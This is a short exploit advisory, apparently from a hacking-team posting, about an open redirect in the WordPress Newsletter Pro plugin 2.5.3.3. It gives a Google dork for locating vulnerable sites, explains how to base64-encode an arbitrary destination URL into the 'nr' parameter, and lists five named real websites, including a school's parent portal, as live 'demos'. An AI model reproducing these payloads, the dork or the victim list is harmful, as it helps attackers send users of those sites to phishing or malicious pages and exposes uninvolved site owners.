[^][^][^][^][^][^][^][^][^][^][^]
[^] Exploit Title  : Wordpress Newsletter Pro Plugin Open Redirect
[^] Exploit Author : Ashiyane Digital Security Team
[^] Vendor Homepage: http://www.thenewsletterplugin.com/downloads
[^] Google Dork    : inurl:newsletter-pro/do.php
[^] Date           : 06 Feb. 2016
[^] Tested On      : Win 10 | CyberFox Browser & Kali Linux | IceWeasel
[^] Version        : 2.5.3.3
[^]
[^][^][^][^][^][^][^][^][^][^][^]
[^] Vulnerable PHP File = newsletter-pro/do.php
[^] Vulnerable Parameter = nr
[^]
[^] How To Attack :
[^]
[^] Attack Like =  
site.com/wp-content/plugins/newsletter-pro/do.php?a=r&nr=NTI7MDtodHRwOi8vZ29vZ2xlLmNvbTtodHRwOi8vZ29vZ2xlLmNvbQ==
[^]
[^] the nr parameter should be base64 encoded
[^]
[^] if you decode it you can add your url after  
Something,Something,Something, And Encode It
[^]
[^] For Example :  
NTI7MDtodHRwOi8vZ29vZ2xlLmNvbTtodHRwOi8vZ29vZ2xlLmNvbQ== ( Decode is )  
: 52;0;http://google.com;http://google.com
[^]
[^][^][^][^][^][^][^][^][^][^][^]
[^] Demos :
[^]
[^]
[^]  
http://daaam.info/wp-content/plugins/newsletter-pro/do.php?a=r&nr=NTI7MDtodHRwOi8vZ29vZ2xlLmNvbTtodHRwOi8vZ29vZ2xlLmNvbQ==
[^]
[^]  
http://www.automaticbooks.org/wp-content/plugins/newsletter-pro/do.php?a=r&nr=OTszMzQ7aHR0cDovL2dvb2dsZS5jb207aHR0cDovL2dvb2dsZS5jb20=
[^]
[^]  
http://autismodiario.org/wp-content/plugins/newsletter-pro/do.php?a=r&nr=OTszMzQ7aHR0cDovL2dvb2dsZS5jb207aHR0cDovL2dvb2dsZS5jb20=
[^]
[^]  
http://www.bigfatzoproductions.nl/wp-content/plugins/newsletter-pro/do.php?a=r&nr=OTszMzQ7aHR0cDovL2dvb2dsZS5jb207aHR0cDovL2dvb2dsZS5jb20=
[^]
[^]  
http://inside.isb.ac.th/parentportal/wp-content/plugins/newsletter-pro/do.php?a=r&nr=OTszMzQ7aHR0cDovL2dvb2dsZS5jb207aHR0cDovL2dvb2dsZS5jb20=
[^]
[^][^][^][^][^][^][^][^][^][^][^]
[^] Discovered by : Ac!D
[^] tnQ : H.empire , M.hidden , M.hacking , Sh.BlackHAT , V for  
vendetta , Sh.Cloner & Hassan
[^][^][^][^][^][^][^][^][^][^][^]